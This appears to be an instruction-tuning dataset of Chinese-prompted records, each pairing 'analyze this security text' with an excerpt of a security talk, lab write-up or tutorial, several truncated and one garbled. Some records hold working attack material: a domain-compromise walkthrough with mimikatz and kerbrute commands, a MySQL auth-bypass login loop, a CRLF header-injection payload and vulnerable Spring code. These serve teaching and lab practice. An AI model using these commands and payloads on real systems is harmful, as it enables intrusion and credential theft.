{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n前: 由于本次靶场环境L.N.前辈给的权限是直接在内的权限所以缺少了实战中最艰难且必不可少的 环那就是点的获取以下wp是模拟实战中vpn配置件泄漏导致内沦陷的过程 1点 模拟vpn配置件泄漏连接后发现分配ip如下 然后我们尝试扫描10.10.0/16段的常规端和banner以及些常漏洞 发现简易脆弱点如下 10.10.22.161 windows rpc调可能存在ssrf 配合401中继 10.10.24.52存在sql注以及main.php件任意写 10.10.22.44 ajp 10.10.22.67 17010 03 x86 10.10.26.151 ajp 最终选择攻击最简单的 通过fb成功上线2003server 然后fgdump抓取03hash 密码没有可以解密成功的 (注意收集本地管理hash和guacadmin的hash) 此时的思路(1收集到的密码枚举个域内户后 利CVE-2021-1675或者CVE-2021-34527直 接打dc 或者看看有可打的资源委派 2尝试1472漏洞 3GPP) 2golden.eagle.banking 通过kerbrute.exe对收集到的户名和密码进枚举--未能枚举成功 然后发现能通过1472拿下域dc后发现发现与域存在双向信任关系 3eagle.banking 然后通过sid::add (参考https://mp.weixin.qq.com/s/OHbFhqyLQlx5W2W40PRoLg和haya前辈的 Mimikatz那些鲜为知的功能-1 ) 获取到根域权限由于USINFDC21.eagle.banking不出 所以通过link上线 4 island.banking island与eagle内传信任 思路1:枚举上两个域的户 kerbrute.exe userenum --dc 10.10.26.11 -d island.banking c:\\programdata\\user.txt 结果个户都没有 1 \"\"privilege::debug\"\" \"\"sid::patch\"\" \"\"sid::add /sid:S-1-5-21-1836858824-13935542 思路2:通过前期收集的guacadmin打机器(这只guacadmin是因为渗透过程中发现了每台机器的本 地administrator密码都不同) 思路3:-->尝试GPP 并未发现敏感xml件 思路4:由于是内传信任尝试eagle认证去打island 的打印机 成功拿下island 由于靶标是融敏感数据,刚好员域的domain group 存在财务数据组 此时可以通过UserEvenHunter 或者拖dc 4624志去查看此户组的户平时登陆的机器 这我是拖域志如下发现多个户都是登陆的BFINFFL44这台机器 但是发现这台机器有df最终bypass上线后发现此机器应该为融组的员共享作机器 最后附上此次络top图", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n#BHUSA @BlackHatEvents A New Trend for the Blue Team Using a Practical Symbolic Engine to Detect Evasive Forms of Malware/Ransomware Hank Chen Sheng-Hao Ma Mars Cheng @hank0438 @aaaddress1 @marscheng_ TXOne Networks Inc. #BHUSA @BlackHatEvents Who are we? Hank Chen Sheng-Hao Ma Mars Cheng Manager PSIRT and Threat Research Threat Researcher PSIRT and Threat Research Threat Researcher PSIRT and Threat Research  Spoke at Black Hat, RSA Conference, DEFCON, SecTor, FIRST, HITB, ICS Cyber Security Conference, HITCON, SINCON, CYBERSEC, and CLOUDSEC  Instructor of CCoE Taiwan, Ministry of National Defense, Ministry of Education, Ministry of Economic Affairs and etc.  General Coordinator of HITCON 2022 and 2021  Vice General Coordinator of HITCON 2020  Spoke at Black Hat, DEFCON, HITB, VXCON, HITCON, ROOTCON, and CYBERSEC  Instructor of CCoE Taiwan, Ministry of National Defense, Ministry of Education, and etc.  The author of the popular security book \"Windows APT Warfare: The Definitive Guide for Malware Researchers\"  Spoke at FIRST Conference in 2022  Instructor of Ministry of National Defense  Teaching assistant of Cryptography and Information Security Course in Taiwan NTHU and CCoE Taiwan  Member of CTF team 10sec and TSJ #BHUSA @BlackHatEvents Outline  Introduction  Threat Overview  The Difficult Problem of Static/Dynamic Malware Detection and Classification  Deep Dive into Our Practical Symbolic Engine  Related Work  Our Practical Symbolic Engine  Demonstration  CRC32 & DLL ReflectiveLoader  Process Hollowing  Ransomware Detection  Future Works and Closing Remarks #BHUSA @BlackHatEvents Outline  Introduction  Threat Overview  The Difficult Problem of Static/Dynamic Malware Detection and Classification  Deep Dive into Our Practical Symbolic Engine  Related Work  Our Practical Symbolic Engine  Demonstration  CRC32 & DLL ReflectiveLoader  Process Hollowing  Ransomware Detection  Future Works and Closing Remarks #BHUSA @BlackHatEvents Threat Overview Malware Type Virus Adwa", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# Mysql 身份认证绕过漏洞CVE-2012-2122 当连接MariaDB/MySQL时输入的密码会与期望的正确密码比较由于不正确的处理会导致即便是memcmp()返回一个非零值也会使MySQL认为两个密码是相同的也就是说只要知道用户名不断尝试就能够直接登入SQL数据库 受影响版本 - MariaDB versions from 5.1.62, 5.2.12, 5.3.6, 5.5.23 are not. - MySQL versions from 5.1.63, 5.5.24, 5.6.6 are not. 参考链接 - http://www.freebuf.com/vuls/3815.html - https://blog.rapid7.com/2012/06/11/cve-2012-2122-a-tragically-comedic-security-flaw-in-mysql/ ## 环境搭建 经过测试本环境虽然运行在容器内部但漏洞是否能够复现仍然与宿主机有一定关系宿主机最好选择Ubuntu或Mac系统但也不知道是否一定能够成功欢迎在Issue中提交更多测试结果 执行如下命令启动测试环境 ``` docker compose up -d ``` 环境启动后将启动一个Mysql服务版本5.5.23监听3306端口通过正常的Mysql客户端可以直接登录的正确root密码是123456 ## 漏洞验证 在不知道我们环境正确密码的情况下在bash下运行如下命令在一定数量尝试后便可成功登录 ```bash for i in `seq 1 1000`; do mysql -uroot -pwrong -h your-ip -P3306 ; done ``` ![](1.png) 更多测试和利用方法见参考链接", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nNIST Special Publication NIST SP 800-161r1 Cybersecurity Supply Chain Risk Management Practices for Systems and Organizations Jon Boyens Angela Smith Nadya Bartol Kris Winkler Alex Holbrook Matthew Fallon This publication is available free of charge from: https://doi.org/10.6028/NIST.SP.800-161r1 NIST Special Publication NIST SP 800-161r1 Cybersecurity Supply Chain Risk Management Practices for Systems and Organizations Jon Boyens Angela Smith Computer Security Division Information Technology Laboratory Nadya Bartol Kris Winkler Alex Holbrook Matthew Fallon Boston Consulting Group This publication is available free of charge from: https://doi.org/10.6028/NIST.SP.800-161r1 May 2022 U.S. Department of Commerce Gina M. Raimondo, Secretary National Institute of Standards and Technology Laurie E. Locascio, NIST Director and Undersecretary of Commerce for Standards and Technology i Authority This publication has been developed by NIST in accordance with its statutory responsibilities under the Federal Information Security Modernization Act (FISMA) of 2014, 44 U.S.C.  3551 et seq., Public Law (P.L.) 113-283. NIST is responsible for developing information security standards and guidelines, including minimum requirements for federal information systems, but such standards and guidelines shall not apply to national security systems without the express approval of appropriate federal officials exercising policy authority over such systems. This guideline is consistent with the requirements of the Office of Management and Budget (OMB) Circular A-130. Nothing in this publication should be taken to contradict the standards and guidelines made mandatory and binding on federal agencies by the Secretary of Commerce under statutory authority. Nor should these guidelines be interpreted as altering or superseding the existing authorities of the Secretary of Commerce, Director of the OMB, or any other federal official. This publication may be used by nongovernmental organizations on a v", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# Cr4ckZ33C0d3 Reversing, 466 points ## Description: A binary was attached, as well as a server address. ## Solution: Let's run the binary: ```console root@kali:/media/sf_CTFs/tamu/Cr4ckZ33C0d3# ./prodkey Please Enter a product key to continue: test Key was too short 5. ``` So we'll have to provide some product key in order to get the flag. Let's check out the decompiled C source using ghidra: ```c undefined8 main(void) { ulong uVar1; FILE *__stream; long in_FS_OFFSET; char user_key [32]; char local_78 [104]; long local_10; local_10 = *(long *)(in_FS_OFFSET + 0x28); puts(\"\\nPlease Enter a product key to continue: \"); fgets(user_key,30,stdin); uVar1 = verify_key(user_key); if ((char)uVar1 != 0) { __stream = fopen(\"flag.txt\",\"r\"); if (__stream == (FILE *)0x0) { puts(\"Too bad the flag is only on the remote server!\"); } else { fgets(local_78,100,__stream); printf(\"%s\",local_78); } } if (local_10 == *(long *)(in_FS_OFFSET + 0x28)) { return 0; } /* WARNING: Subroutine does not return */ __stack_chk_fail(); } ulong verify_key(char *user_key) { uint uVar1; size_t key_len; size_t sVar2; undefined8 uVar3; ulong uVar4; key_len = strlen(user_key); if (28 < key_len) { uVar3 = check_01((long)user_key); if ((((((char)uVar3 == 0) || (uVar3 = check_02((long)user_key), (char)uVar3 == 0)) || (uVar3 = check_03((long)user_key), (char)uVar3 == 0)) || (((uVar4 = check_04((long)user_key), (char)uVar4 == 0 || (uVar4 = check_05((long)user_key), (char)uVar4 == 0)) || ((uVar4 = check_06((long)user_key), (char)uVar4 == 0 || ((uVar4 = check_07((long)user_key), (char)uVar4 == 0 || (uVar4 = check_08((long)user_key), (char)uVar4 == 0)))))))) || ((uVar4 = check_09((long)user_key), (char)uVar4 == 0 || (((((uVar4 = check_0A((long)user_key), (char)uVar4 == 0 || (uVar3 = check_0B((long)user_key), (char)uVar3 == 0)) || (uVar4 = check_0C((long)user_key), (char)uVar4 == 0)) || ((uVar4 = check_0D((long)user_key), (char)uVar4 == 0 || (uVar4 = check_0E((long)user_key), (char)uVar4 == 0)))) || (uVar4 = check_0", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# CRLF注入 ```java package com.example.controller; import org.springframework.http.HttpHeaders; import org.springframework.http.HttpStatus; import org.springframework.http.ResponseEntity; import org.springframework.web.bind.annotation.RequestMapping; import org.springframework.web.bind.annotation.RequestParam; import org.springframework.web.bind.annotation.RestController; @RestController public class UserController { @RequestMapping(value = \"/crlf\") public ResponseEntity<String> example(@RequestParam(\"name\") String name) { String message = \"Hello, \" + name; HttpHeaders headers = new HttpHeaders(); headers.set(\"Location\", \"https://example.com\"); headers.set(\"test\",name); return new ResponseEntity<>(message, headers, HttpStatus.OK); } } ``` ```sh GET /crlf?name=%0d%0aSet-Cookie:%20sessionid=123456 HTTP/1.1 Host: 127.0.0.1:8080 Content-Type: application/x-www-form-urlencoded Content-Length: 0 ``` ![image-20230314161742162](../../.gitbook/assets/image-20230314161742162.png) 修复代码 ```java package com.example.controller; import org.springframework.http.HttpHeaders; import org.springframework.http.HttpStatus; import org.springframework.http.ResponseEntity; import org.springframework.web.bind.annotation.RequestMapping; import org.springframework.web.bind.annotation.RequestParam; import org.springframework.web.bind.annotation.RestController; import org.springframework.web.util.UriUtils; import java.nio.charset.StandardCharsets; @RestController public class UserController { @RequestMapping(value = \"/crlf\") public ResponseEntity<String> example(@RequestParam(\"name\") String name) { String encodedName = UriUtils.encode(name, StandardCharsets.UTF_8); String message = \"Hello, \" + encodedName; HttpHeaders headers = new HttpHeaders(); headers.set(\"Location\", \"https://example.com\"); headers.set(\"test\",encodedName); return new ResponseEntity<>(message, headers, HttpStatus.OK); } } ``` ![image-20230314161849070](../../.gitbook/assets/image-20230314161849070.png)", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n2012 Presented by: Pwning you(r) cyber offenders Piotr Duszynski @drk1wi  2012 ;WHOAMI;#?  Senior Security Consultant @Trustwave OSCP, OSCE, CEH  In security field for the past 6 years, hacking since 9   Enjoys security research, crazy road trips, mojitos and good music  Regardless of this slide title tries not to be too nerdy 2  2012 What is this presentation about?  New defensive technique that renders your port scan results useless  WOOT  New attack vectors against you(r) attackers offensive toolbox  WOOT WOOT  Short introduction to a tool called: Portspoof.  PWNage POC DEMO for one of the well known port scanners. 3 Active (Offensive) defense in practice  2012  2012 Blind attackers tools The art of Annoyance and Camouflage  2012 Destroying the reconnaissance phase  Typical case scenario ( a target system is behind a Firewall ) 5 $ nmap sV -O demo.addr.pl  2012 Portspoof  implementation of the idea 6 GOAL: make your attackers port scanning experience a real pain Worst possible scenario:  All 65535 ports are open  *Portspoof will bind to a single port  On every open port there is a service listening *Portspoof will dynamically generate valid service signatures ~ 8000 supported Your task: Identify all real services on the remote system  2012 Rendering your port scan useless with Portspoof  Worst case scenario (target system is behind the Portspoof) : 7 $ nmap sV p - -PN demo.addr.pl .you will need a lot of patience!  2012 Rendering your port scan useless 8 Scanning statistics: 65.535 open ports (services) ~120 MB of sent data 30682 s (8.5h) and few beers later   2012 Rendering your port scan useless  NMAP OS identification results 9 $ nmap sV -O demo.addr.pl  2012 Rendering your port scan useless  NMAP OS identification results: 10 Device type: general purpose Running (JUST GUESSING): Linux 3.X (93%) OS CPE: cpe:/o:linux:linux_kernel:3 Aggressive OS guesses: Linux 3.2 (93%), Linux 3.0 (92%), Linux 3.0 - 3.2 (85%) No exact OS matches for host (test conditions non-id", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nCross-Platform Analysis of Indirect File Leaks in Android and iOS Applications Daoyuan Wu PhD Candidate at SMU HITCON Pacific17 Appified World 2 Pic source: https://www.hughesandco.com/native-mobile-apps-vs-web-apps/ Mobile Sandbox Pic source: http://hiqes.com/android-security-part-1/  Different threat model from the PC side 3 Direct File Leak Case: https://tinyurl.com/CVE-2011-1717 Reference: The SEAndroid paper in NDSS13. Once worked; but no longer with SEAndroid -rw-rw-rw- main.db -rw-rw-rw- shared.xml CVE-2011-1717 for SKype  4 $ getenforce Enforcing How to steal private app files within the protection of SEAndroid? Remote Adversary IFL: Indirect File Leak Deputy Component Local Adversary SEAndroid cannot check it Allowed by SEAndroid 6 Exploitable Deputy Components Deputy Components for IFLs Content Provider Browsing Interface Command Interpreter Embedded App Server 7 What is Android Content Provider?  System providers:  content://sms/  content://call_log/  content://browser/ bookmarks  Apps own providers:  content://qq.profile/ info  content://qq.friend list/friendlist Android App Read/Write Interface 8 Data Content Provider IFL via Content Provider 9 1 2 10 http://www4.comp.polyu.edu.hk/~appsec/ Many Popular Apps were identified by us to be vulnerable (over 60 CVEs) 11 Spent a lot of efforts writing reports (now first released in HITCON17) https://github.com/daoyuan14/ContentProviderReports  It all started with reading API document:  I tested the first PoC on Mi Talk (米聊)  In the end of Oct 2011 (tested on v2.1.280);  We should make a good paper () as the 1st reporter. Story Behind 12 By default exported before Android 4.2 targetSdkVersion < 17 The major focus of this talk: IFL over Browsing Interface IFL via Browsing Interface  What is browsing interface?  Almost everywhere in popular apps:  See next slide. 14 Facebooks Browsing Interface Twitters Browsing Interface WeChats Browsing Interface Whatsapps Browsing Interface Yahoo Mails Browsing Interface 15 IFL", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n指令型遠控軟體輕鬆談 指令型遠控軟體輕鬆談 簡報者 簡報者 Kelp Kelp kelp@phate.tw kelp@phate.tw PDF created with pdfFactory Pro trial version www.pdffactory.com 簡介 簡介 u u 了解指令型遠端操控軟體的基本架構 了解指令型遠端操控軟體的基本架構 PDF created with pdfFactory Pro trial version www.pdffactory.com 訓練大綱 訓練大綱 u u 單元 單元 11何謂遠控軟體 何謂遠控軟體 u u 單元 單元 22遠控軟體分析 遠控軟體分析 u u 單元 單元 33總結 總結 PDF created with pdfFactory Pro trial version www.pdffactory.com 單元 單元 11何謂遠控軟體 何謂遠控軟體 u u 能夠控制遠端電腦的軟體都能稱為遠端操 能夠控制遠端電腦的軟體都能稱為遠端操 控軟體 控軟體 u u 遠控軟體大部分透過網路進行遠端電腦控 遠控軟體大部分透過網路進行遠端電腦控 制 制 PDF created with pdfFactory Pro trial version www.pdffactory.com 單元 單元 11何謂遠控軟體 何謂遠控軟體 木馬 木馬 後門 後門 VNC VNC   PDF created with pdfFactory Pro trial version www.pdffactory.com 單元 單元 22遠控軟體分析 遠控軟體分析 如何連線 如何連線?? Server Client Socket() Socket() Bind() Listen() Accept() Read() Write() Connect() Write() Read() PDF created with pdfFactory Pro trial version www.pdffactory.com 單元 單元 22遠控軟體分析 遠控軟體分析 如何連線 如何連線?? 反向連結 反向連結 一般木馬都使用這種連線方式 一般木馬都使用這種連線方式 正向連結 正向連結 遠端桌面就是用此方式連結 遠端桌面就是用此方式連結 PDF created with pdfFactory Pro trial version www.pdffactory.com 單元 單元 22遠控軟體分析 遠控軟體分析 如何連線 如何連線?? Servant Connect (反向) 載入物件&陣列 Master Connect (正向) 斷線 釋放物件&陣列 驗證密碼 載入Servant資料 成功建立連線 Pass PDF created with pdfFactory Pro trial version www.pdffactory.com 單元 單元 22遠控軟體分析 遠控軟體分析 Master Servant 一對一進行操控 PDF created with pdfFactory Pro trial version www.pdffactory.com 單元 單元 22遠控軟體分析 遠控軟體分析 Master Servant Servant Servant Servant Servant Servant  同時控制多台電腦 PDF created with pdfFactory Pro trial version www.pdffactory.com 單元 單元 22遠控軟體分析 遠控軟體分析 Relay station Servant Servant Servant Servant Servant Servant  Master PDF created with pdfFactory Pro trial version www.pdffactory.com 單元 單元 22遠控軟體分析 遠控軟體分析 遠控軟體 一對一 一對多 遠端桌面VNC 一般遠控軟體 rootkit 灰鴿子 Evis PDF created with pdfFactory Pro trial version www.pdffactory.com 單元 單元 22遠控軟體分析 遠控軟體分析 PDF created with pdfFactory Pro trial version www.pdffactory.com 單元 單元 22遠控軟體分析 遠控軟體分析 PDF created with pdfFactory Pro trial version www.pdffactory.com 單元 單元 22遠控軟體分析 遠控軟體分析 功能不夠 功能不夠?! ?!  功", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# Mr-Robot1 下载地址 ``` https://download.vulnhub.com/mrrobot/mrRobot.ova ``` ## 实战操作 靶机扫描地址`192.168.32.169` ![image-20220715095522855](../../.gitbook/assets/image-20220715095522855.png) 对靶机进行端口扫描 ``` (rootkali)-[~/Desktop] # nmap -p1-65535 192.168.32.169 Starting Nmap 7.92 ( https://nmap.org ) at 2022-07-14 21:55 EDT Nmap scan report for 192.168.32.169 Host is up (0.00030s latency). Not shown: 65532 filtered tcp ports (no-response) PORT STATE SERVICE 22/tcp closed ssh 80/tcp open http 443/tcp open https MAC Address: 00:0C:29:DC:72:F4 (VMware) Nmap done: 1 IP address (1 host up) scanned in 106.71 seconds ``` 访问80端口网站是动画 ![image-20220715095913509](../../.gitbook/assets/image-20220715095913509.png) 扫描80端口 ``` (rootkali)-[~/Desktop] # nikto -h http://192.168.32.169 - Nikto v2.1.6 --------------------------------------------------------------------------- + Target IP: 192.168.32.169 + Target Hostname: 192.168.32.169 + Target Port: 80 + Start Time: 2022-07-14 21:58:32 (GMT-4) --------------------------------------------------------------------------- + Server: Apache + The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of + The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in + Retrieved x-powered-by header: PHP/5.5.29 + No CGI Directories found (use '-C all' to force check all possible dirs) + Uncommon header 'tcn' found, with contents: list + Apache mod_negotiation is enabled with MultiViews, which allows attackers to easily brute force file names. See htt + OSVDB-3092: /admin/: This might be interesting... + Uncommon header 'link' found, with contents: <http://192.168.32.169/?p=23>; rel=shortlink + /wp-links-opml.php: This WordPress script reveals the installed version. + OSVDB-3092: /license.txt: License file found may identify site software. + /admin/index.html: Admin login page/section found. + Cookie wordpress_test_cookie created without the http", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# 正则表达式 <!-- GFM-TOC --> * [正则表达式](#正则表达式) * [一概述](#一概述) * [二匹配单个字符](#二匹配单个字符) * [三匹配一组字符](#三匹配一组字符) * [四使用元字符](#四使用元字符) * [五重复匹配](#五重复匹配) * [六位置匹配](#六位置匹配) * [七使用子表达式](#七使用子表达式) * [八回溯引用](#八回溯引用) * [九前后查找](#九前后查找) * [十嵌入条件](#十嵌入条件) * [参考资料](#参考资料) <!-- GFM-TOC --> ## 一概述 正则表达式用于文本内容的查找和替换 正则表达式内置于其它语言或者软件产品中它本身不是一种语言或者软件 [正则表达式在线工具](https://regexr.com/) ## 二匹配单个字符 **.** 可以用来匹配任何的单个字符但是在绝大多数实现里面不能匹配换行符 **.** 是元字符表示它有特殊的含义而不是字符本身的含义如果需要匹配 . 那么要用 \\ 进行转义即在 . 前面加上 \\  正则表达式一般是区分大小写的但也有些实现不区分 **正则表达式** ``` C.C2018 ``` **匹配结果** My name is **CyC2018** . ## 三匹配一组字符 **[ ]** 定义一个字符集合 0-9a-z 定义了一个字符区间区间使用 ASCII 码来确定字符区间在 [ ] 中使用 **-** 只有在 [ ] 之间才是元字符在 [ ] 之外就是一个普通字符 **** 在 [ ] 中是取非操作 **应用** 匹配以 abc 为开头并且最后一个字母不为数字的字符串 **正则表达式** ``` abc[0-9] ``` **匹配结果** 1. **abcd** 2. abc1 3. abc2 ## 四使用元字符 ### 匹配空白字符 | 元字符 | 说明 | | :---: | :---: | | [\\b] | 回退删除一个字符 | | \\f | 换页符 | | \\n | 换行符 | | \\r | 回车符 | | \\t | 制表符 | | \\v | 垂直制表符 | \\r\\n 是 Windows 中的文本行结束标签在 Unix/Linux 则是 \\n \\r\\n\\r\\n 可以匹配 Windows 下的空白行因为它匹配两个连续的行尾标签而这正是两条记录之间的空白行 ### 匹配特定的字符 #### 1. 数字元字符 | 元字符 | 说明 | | :---: | :---: | | \\d | 数字字符等价于 [0-9] | | \\D | 非数字字符等价于 [0-9] | #### 2. 字母数字元字符 | 元字符 | 说明 | | :---: | :---: | | \\w | 大小写字母下划线和数字等价于 [a-zA-Z0-9\\_] | | \\W | 对 \\w 取非 | #### 3. 空白字符元字符 | 元字符 | 说明 | | :---: | :---: | | \\s | 任何一个空白字符等价于 [\\f\\n\\r\\t\\v] | | \\S | 对 \\s 取非 | \\x 匹配十六进制字符\\0 匹配八进制例如 \\xA 对应值为 10 的 ASCII 字符 即 \\n ## 五重复匹配 - **\\+** 匹配 1 个或者多个字符 - **\\** * 匹配 0 个或者多个字符 - **?** 匹配 0 个或者 1 个字符 **应用** 匹配邮箱地址 **正则表达式** ``` [\\w.]+@\\w+\\.\\w+ ``` [\\w.] 匹配的是字母数字或者 . 在其后面加上 + 表示匹配多次在字符集合 [ ] 里. 不是元字符 **匹配结果** **abc.def\\<span\\>@\\</span\\>qq.com** - **{n}** 匹配 n 个字符 - **{m,n}** 匹配 m\\~n 个字符 - **{m,}** 至少匹配 m 个字符 \\* 和 + 都是贪婪型元字符会匹配尽可能多的内容在后面加 ? 可以转换为懒惰型元字符例如 \\*?+? 和 {m,n}?  **正则表达式** ``` a.+c ``` **匹配结果** **abcabcabc** 由于 + 是贪婪型的因此 .+ 会匹配更可能多的内容所以会把整个 abcabcabc 文本都匹配而不是只匹配前面的 abc 文本用懒惰型可以实现匹配前面的 ## 六位置匹配 ### 单词边界 **\\b** 可以匹配一个单词的边界边界是指位于 \\w 和 \\W 之间的位置**\\B** 匹配一个不是单词边界的位置 \\b 只匹配位置不匹配字符因此 \\babc\\b 匹配出来的结果为 3 个字符 ### 字符串边界 **** 匹配整个字符串的开头**$** 匹配结尾  元", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# Unicorn Engine简介 ## 什么是Unicorn引擎 Unicorn是一个轻量级, 多平台, 多架构的CPU模拟器框架. 我们可以更好地关注CPU操作, 忽略机器设备的差异. 想象一下, 我们可以将其应用于这些情景: 比如我们单纯只是需要模拟代码的执行而非需要一个真的CPU去完成那些操作, 又或者想要更安全地分析恶意代码, 检测病毒特征, 或者想要在逆向过程中验证某些代码的含义. 使用CPU模拟器可以很好地帮助我们提供便捷. 它的亮点(这也归功于Unicorn是基于[qemu](http://www.qemu.org)而开发的)有: * 支持多种架构: Arm, Arm64 (Armv8), M68K, Mips, Sparc, & X86 (include X86_64). * 对Windows和*nix系统(已确认包含Mac OSX, Linux, *BSD & Solaris)的原生支持 * 具有平台独立且简洁易于使用的API * 使用JIT编译技术, 性能表现优异 你可以在[Black Hat USA 2015](http://www.unicorn-engine.org/BHUSA2015-unicorn.pdf)获悉有关Unicorn引擎的更多技术细节. Github项目主页: [unicorn](https://github.com/unicorn-engine/unicorn) 尽管它不同寻常, 但它无法模拟整个程序或系统, 也不支持系统调用. 你需要手动映射内存并写入数据进去, 随后你才能从指定地址开始模拟. ## 应用的情景 什么时候能够用到Unicorn引擎呢? * 你可以调用恶意软件中一些有趣的函数, 而不用创建一个有害的进程. * 用于CTF竞赛 * 用于模糊测试 * 用于gdb插件, 基于代码模拟执行的插件 * 模拟执行一些混淆代码 ## 如何安装 安装Unicorn最简单的方式就是使用pip安装, 只要在命令行中运行以下命令即可(这是适合于喜爱用python的用户的安装方法, 对于那些想要使用C的用户, 则需要去官网查看文档编译源码包): ``` shell pip install unicorn ``` 但如果你想用源代码进行本地编译的话, 你需要在[下载](http://www.unicorn-engine.org/download/)页面中下载源代码包, 然后可以按照以下命令执行: * *nix 平台用户 ``` shell $ cd bindings/python $ sudo make install ``` * Windows平台用户 ``` shell cd bindings/python python setup.py install ``` 对于Windows, 在执行完上述命令后, 还需要将[下载](http://www.unicorn-engine.org/download/)页面的`Windows core engine`的所有dll文件复制到`C:\\locationtopython\\Lib\\site-packages\\unicorn`位置处. ## 使用unicorn的快速指南 我们将会展示如何使用python调用unicorn的api以及它是如何轻易地模拟二进制代码. 当然这里用的api仅是一小部分, 但对于入门已经足够了. ``` python 1 from __future__ import print_function 2 from unicorn import * 3 from unicorn.x86_const import * 4 5 # code to be emulated 6 X86_CODE32 = b\"\\x41\\x4a\" # INC ecx; DEC edx 7 8 # memory address where emulation starts 9 ADDRESS = 0x1000000 10 11 print(\"Emulate i386 code\") 12 try: 13 # Initialize emulator in X86-32bit mode 14 mu = Uc(UC_ARCH_X86, UC_MODE_32) 15 16 # map 2MB memory for this emulation 17 mu.mem_map(ADDRESS, 2 * 1024 * 1024) 18 19 # write machine code to be emulated to memory 20 mu.mem_write(ADDRESS, X86_CODE32) 21 22 # initialize machine registers ", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nHackingDojo.com HackingDojo.com Education Masters Degrees in Computer Security:  Computer Science  Management Author since 2007 Professional Penetration Testing Ninja Hacking Netcat Power Tools Penetration Testings Open Source Toolkit, V2 Certifications ISSMP, CISSP, SCSECA, SCNA, SCSA, IEM/IAM HackingDojo.com Education The George Washington University (MA) University of Redlands (BA) Author multiple articles Network Forensics: The Tree in the Forest The Security Consulting Sugar High Hack First, Policy Second  A mobile Device Story Certifications CISSP CCISO Certified Computer Forensic Specialist HackingDojo.com Learn how to use Kali Linux to attack network protocols CAM Table Overflow VLAN Hopping ARP Poisoning DHCP Spoofing If you know how to do this, please give up your seat so others can join in (assuming we have a full class) HackingDojo.com Pre-installed Kali Linux Prefer to have it as the main OS, not virtualized CAT5 cable of sufficient length We didnt know in advance how the rooms would be, so please bear with us when we get everyone connected Patience 4 hours, 4 tasks, a LOT of network congestion This is a HOSTILE NETWORK!! HackingDojo.com Do / Dont Everyone is here to learn, so dont impede others Embrace other peoples genius Workshop = Group Effort, work as a team Workshop != Taking over someone elses keyboard Were here to learn, not be pedantic over terms HackingDojo.com Content Addressable Memory Table Layer 2 (Switch) Records MAC addresses and saves them for switching purposes HackingDojo.com HackingDojo.com Overflow it, and have no mercy! When CAM table fills up, it pushes all data out all ports* Essentially, you turn a Switch (L2) into a Hub (L1) #macof <- tool of choice Collect the data Need to collect the packets as it leaves the switch Wireshark is probably the best-known tool, but any pcap capturing app will work HackingDojo.com Good to use when ARP Spoofing is: monitored or blocked Too much traffic across the network Want to attack system on yo", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nMITM ALL THE IPv6 THINGS! Scott Behrens & Brent Bandelgar DEF CON 21 August 2, 2013 Neohapsis Confidential 2 Who are we? Brent Bandelgar  Security Consultant at Neohapsis Scott Behrens  Senior Security Consultant at Neohapsis  Adjunct Professor at DePaul University Nathaniel Couper-Noles  Principal Security Consultant at Neohapsis - YES THIS IS PHOTOSHOPED - THIS ONE IS REAL Neohapsis Confidential 3 SLAAC Attack! Alec Waters, InfoSec Institute 2011 http://resources.infosecinstitute.com/slaac-attack/ Neohapsis Confidential 4 SLAAC Attack Win8 Fail :( Wheres the DNS server? Neohapsis Confidential 5 SLAAC Attack in 2013...the Bad  Non trivial setup  Configuration files  IP addresses/ranges  It uses old and deprecated packages (NAT-PT) Neohapsis Confidential 6 DUNCAN COULDN'T GET IT TO WORK?! VOX COULDN'T GET NAPTD TO COMPILE?! Neohapsis Confidential 7 SLAAC Attack in 2013 WE NEED Neohapsis Confidential 8 Solution: Sudden Six  One Bash script to rule them all!  Install dependencies  Configure attack host  Works with Windows 7 and 8!  No more depreciated libraries and packages  Currently tested on Ubuntu 12.04 LTS and Kali Neohapsis Confidential 9 Demo  Demo video here Neohapsis Confidential 10 Known Issues  Defenses  Disable IPv6 by policy  IPv6 network defenses (RFC 6105)  Happy Eyeballs  IPv4 fallback (RFC 6555)  DNS  Client race conditions Neohapsis Confidential 11 Future Work  Configure IPv6 tunneling  Automate basic network reconnaissance  Detect IPv6 countermeasures  Leverage THC IPv6 tools  Specify MITM target scope Neohapsis Confidential 12 Download We would love your help! https://github.com/Neohapsis/suddensix Thank You www.neohapsis.com labs.neohapsis.com", "category": "text_analysis", "source": "security_papers"}
